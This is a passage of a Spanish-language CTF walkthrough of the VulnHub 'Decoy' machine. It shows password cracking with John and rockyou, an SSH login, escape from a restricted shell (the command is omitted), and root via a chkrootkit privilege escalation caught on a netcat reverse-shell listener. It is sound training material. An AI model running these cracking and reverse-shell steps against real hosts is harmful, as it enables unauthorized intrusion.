Crackeamos la password con john y el diccionario rockyou.
~/ctf/vulnhub/decoy > sudo /usr/sbin/john tocrack.txt
--wordlist=/home/sml/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
server (96640a3b825115a47b68fc44501c828)
1g 0:00:00:05 DONE (2020-07-10 10:19) 0.1763g/s 3025p/s 3025c/s 3025C/s
felton..Hunter
Use the "--show" option to display all of the cracked passwords reliably
Session completed
La password es "server".
Nos logueamos por ssh :)
Low Shell
~/ctf/vulnhub/decoy/etc > ssh 296640a3b825115a47b68fc44501c828@192.168.1.123
The authenticity of host '192.168.1.123 (192.168.1.123)' can't be established.
ECDSA key fingerprint is SHA256:XcSxTQWk9o60DynaXNIL8HbB93NqEyqofs1B2EORdEE.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.1.123' (ECDSA) to the list of known hosts.
296640a3b825115a47b68fc44501c828@192.168.1.123's password:
Linux 60832e9f188106ec5bcc4eb7709ce592 4.19.0-9-amd64 #1 SMP Debian
4.19.118-2+deb10u1 (2020-06-07) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Jul 7 16:45:50 2020 from 192.168.1.162
-rbash: dircolors: command not found
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$
Al loguearnos vemos que tenemos una "restricted shell".
Para escapar de ella nos logueamos de la siguiente forma:
Por ultimo, ejecutamos el programa honeypot.decoy que se encuentra en nuestra
home y seleccionamos la opcion 5, para que lance el chkrootkit.
<0832e9f188106ec5bcc4eb7709ce592:~$ ./honeypot.decoy
--------------------------------------------------
Welcome to the Honey Pot administration manager (HPAM). Please select an option.
1 Date.
2 Calendar.
3 Shutdown.
4 Reboot.
5 Launch an AV Scan.
6 Check /etc/passwd.
7 Leave a note.
8 Check all services status.
Option selected:5
5
The AV Scan will be launched in a minute or less.
--------------------------------------------------
Al rato... obtenemos la shell de root! :)
~ > nc -nlvp 7777
listening on [any] 7777 ...
connect to [192.168.1.111] from (UNKNOWN) [192.168.1.123] 54282
python3 -c 'import pty; pty.spawn("/bin/bash")'
root@60832e9f188106ec5bcc4eb7709ce592:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root.txt
root@60832e9f188106ec5bcc4eb7709ce592:~# cat root.txt
cat root.txt
........::::::::::::.. .......|...............::::::::........
.:::::;;;;;;;;;;;:::::.... . \ | ../....::::;;;;:::::.......
. ........... / \\_ \ | / ...... . ........./\
...:::../\\_ ...... ..._/' \\\_ \###/ /\_ .../ \_....... _//
.::::./ \\\ _ .../\ /' \\\\#######// \/\ // \_ ....////
_/ \\\\ _/ \\\ / x \\\\###//// \//// \__ _/////
./ x \\\/ \/ x X \////// \/////
/ XxX \\/ XxX X //// x
-----XxX-------------|-------XxX-----------*--------|---*-----|------------X--
X _X * X ** ** x ** * X
_X _X x * x X_
1c203242ab4b4509233ca210d50d2cc5
Thanks for playing! - Felipe Winsnes (@whitecr0wz)
End
Y con esto ya seriamos root de la maquina :)
[1] https://www.exploit-db.com/exploits/33899